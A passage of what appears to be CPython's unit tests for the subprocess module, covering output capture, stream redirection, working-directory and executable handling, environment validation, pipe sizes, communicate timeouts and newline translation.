tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
        # NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
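    # Illustrative sketch, not collected by the test runner: DEVNULL is the
    # portable way to discard a child's streams entirely, and the matching
    # Popen attributes stay None, as the three tests above verify. The helper
    # name below is ours, not part of the suite.
    def _example_call_silently(self, args):
        # Run *args* with every standard stream pointed at os.devnull.
        return subprocess.call(args, stdin=subprocess.DEVNULL,
                               stdout=subprocess.DEVNULL,
                               stderr=subprocess.DEVNULL)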
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
            raise unittest.SkipTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
            # Windows pipe size can be acquired via the GetNamedPipeInfo function
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
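    # Illustrative sketch, not collected by the test runner: the usual way to
    # recover from a communicate() timeout (as described in the subprocess
    # docs) is to kill the child and call communicate() once more to reap it
    # and drain whatever output it produced. The helper name is ours, purely
    # for illustration.
    def _example_communicate_with_deadline(self, args, data=None, timeout=1.0):
        proc = subprocess.Popen(args, stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        try:
            # Normal case: the child finishes before the deadline.
            return proc.communicate(data, timeout=timeout)
        except subprocess.TimeoutExpired:
            # Deadline hit: kill the child, then reap it and collect output.
            proc.kill()
            return proc.communicate()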
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
        # This test will probably deadlock rather than fail if
        # communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # A Python debug build may push something like "[42442 refs]\n"
        # to stderr when the subprocess exits.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
